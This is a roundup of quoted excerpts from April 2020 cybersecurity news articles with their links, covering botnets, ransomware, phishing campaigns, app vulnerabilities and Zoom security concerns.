- “We all know there are a number of different security devices that need to be continually monitored because they represent attack vectors. That’s why understanding configuration management is critical to security hygiene. As practitioners, we need to adhere to CIS controls as they provide a critical baseline for maintaining our security framework and keeping up our integrity monitoring processes.” https://www.tripwire.com/state-of-security/security-data-protection/file-integrity-monitoring/security-leaders-consider-building-business-case-integrity-monitoring/
- “New technologies often present interesting challenges for security teams, with cloud services such as AWS, Azure and GCP providing particularly novel cases in comparison to “classic” on-premise systems. As cloud services race to add new features that drive new customer interest and increase retention of existing clients, there is a very real risk of exposing new threat vectors to the business if even the most minor of misconfigurations occurs. This makes the role of cloud administrators and their daily security practices all the more important.” https://www.tripwire.com/state-of-security/security-data-protection/cloud/auditing-cloud-administrator-behavior-data-breach-preparedness/
- “Dark_nexus, named so due to strings printed on its banner, has code links to both Mirai and Qbot, but the team says the majority of the botnet’s functions are original. ” https://www.blackhatethicalhacking.com/news/dark-nexus-botnet-outstrips-other-malware-with-new-potent-features
- “With this free sigma rule, you can detect BITS activity that is used in a malicious way. Microsoft BITS (Background Intelligent Transfer Service) is a tool present in all modern Microsoft Windows operating systems. As the name says, you can see it as a “curl” or “wget” tool for Windows.” https://www.threathunting.se/2020/04/09/detect-malicious-bits-activity-free-sigma-rule/
- “Disregarding ransomware, persistence is one of the more sought-after techniques of an attacker. Persistence allows an attacker to re-infect a machine or maintain their existing connection after events such as a system reboot, changed credentials, or even a re-imaging a machine. Attackers want to do the least amount of work possible, which includes spending time getting access to their target.” https://www.tripwire.com/state-of-security/mitre-framework/the-mitre-attck-framework-persistence/
- “Google has removed an Android VPN program from the Google Play store after researchers notified it of a critical vulnerability. The app, SuperVPN, has been downloaded over 100 million times.” https://nakedsecurity.sophos.com/2020/04/09/google-removes-android-vpn-with-critical-vulnerability-from-play-store/
- “Check Point’s researchers were able to find three samples, created by Metasploit Framework, carrying the innocent name – ‘coronavirus.apk’. This app that can be easily delivered and installed on large numbers of devices, and can fulfil almost every malicious action the threat actor wishes. Once executed on the device, the app starts a service that hides its icon on order to make it harder to get rid of it.” https://research.checkpoint.com/2020/covid-19-goes-mobile-coronavirus-malicious-applications-discovered/
- Wait till this application, Tuned, gets hacked “Facebook on Tuesday released a new couples-only messaging app that gives you a place to get “as mushy, quirky, and silly” with your bae as you do in front of each other even when you’re apart, keeping it to yourselves and thus avoiding setting off nausea in others.” https://nakedsecurity.sophos.com/2020/04/09/facebooks-new-tuned-chat-app-lets-couples-keep-their-mush-private/
- “Yesterday Google has banned the popular videoconferencing software Zoom from its employees’ devices, and now the German foreign ministry has restricted the use of the video conferencing service to fixed-connection computers due to concerns about security issues.” https://securityaffairs.co/wordpress/101320/security/german-foreign-ministry-zoom-limitation.html
- “The $100 Tapplock smart locks are internet-connected and use fingerprint biometrics for security. The company also offers a companion mobile app that allows users to lock and unlock their smart locks with Bluetooth. The FTC alleges that there are “reasonably foreseeable electronic security vulnerabilities that could have been avoided” within the device and the app.” https://threatpost.com/unbreakable-smart-lock-ftc-deceptive-security-claims/154600/
- “An ongoing phishing campaign is reeling in victims with a recycled Cisco security advisory that warns of a critical vulnerability. The campaign urges victims to “update,” only to steal their credentials for Cisco’s Webex web conferencing platform instead.” https://threatpost.com/cisco-critical-update-phishing-webex/154585/
- “After Sodinokibi is installed, it immediately gets to work. The ransomware begins by creating a .txt file with the path of the encrypted files, with a random extension followed by -HOW-TO-DECRYPT.txt. Commands are then issued for Shadow Volume Copies to be deleted, as well as to disable Windows Startup Repair.” https://resources.infosecinstitute.com/malware-spotlight-sodinokibi/
- “CERT-GIB’s report is based on analyses of coronavirus-related phishing traffic by the Threat Detection System (TDS) Polygon as part of operations to prevent threats spread online. Most COVID-19-related phishing emails analyzed had different spyware strains embedded as attachments. AgentTesla (45%), NetWire (30%), and LokiBot (8%) were the most actively exploited malware families.” https://securityaffairs.co/wordpress/101327/malware/top-malware-coronavirus-campaigns.html
- “While the Iranian cyber program remains at the forefront of Tehran’s asymmetric capabilities, its intelligence apparatus is colored by various dysfunctions and seemingly destabilizing traits. In particular, the politicization of its various intelligence agencies and ensuing domestic feuds have reportedly polarized officer-level rank and file throughout the various security crises of the Islamic Republic. These crises have surfaced publicly and have acted as catalysts to drive insider threats, have lowered intelligence morale, and have increased the occurrences of leaks. Competition between the intelligence groups has also allegedly led to direct acts of sabotage between agencies.” https://www.recordedfuture.com/iran-cyber-operations-structure/
- “The online videoconferencing service added Alex Stamos to the team and has also formed an expert advisory board to grapple with the pains of its COVID-19 growth spurt.” https://threatpost.com/zoom-facebook-ciso-security-lawsuit/154614/
- “Phishing scammers have started to impersonate President Trump and Vice President Mike Pence in emails that distribute malware or perform extortion scams” https://www.bleepingcomputer.com/news/security/phishing-emails-impersonate-the-white-house-and-vp-mike-pence/
- “Travelex reportedly paid a $2.3 million ransom payment to get their systems back online after being encrypted by a Sodinokibi ransomware attack.” https://www.bleepingcomputer.com/news/security/travelex-reportedly-paid-23-million-ransom-to-restore-operations/
- “Payments processor Visa is urging merchants to migrate their online stores to Magento 2.x before the Magento 1.x e-commerce platform reaches end-of-life (EoL) in June 2020 to avoid exposing their stores to Magecart attacks and to remain PCI compliant.” https://www.bleepingcomputer.com/news/security/visa-urges-merchants-to-migrate-e-commerce-sites-to-magento-2x/
- “Developers of fleeceware apps are now using the Apple App Store as a distribution platform having already successfully delivered their iOS apps onto over 3.5 million iPhone and iPad devices according to a report from Sophos.” https://www.bleepingcomputer.com/news/security/over-36m-users-installed-ios-fleeceware-from-apple-s-app-store/
- “Several federal agencies recommended Thursday that U.S. regulators block a Chinese state-owned telecommunications firm from providing service to American customers.” https://www.cyberscoop.com/executive-branch-agencies-recommend-us-bar-china-telecom/
- “Countless legitimate businesses are offering discounts or altering their services to turn a profit during the coronavirus pandemic. Cybercriminal forums are no different.” https://www.cyberscoop.com/coronavirus-cybercrime-forums-dark-web/
#security #cybersecurity #itsecurity #privacy #cis #aws #azure #gcp #darknexus #ddos #botnet #mirai #qbot #mitre #att&ck #supervpn #cerberus #hiddad #tuned #zoom #tapplock #webex #sodinokibi #agenttesla #networe #lokibot #iran #travelex #magento #visa #fleeceware #china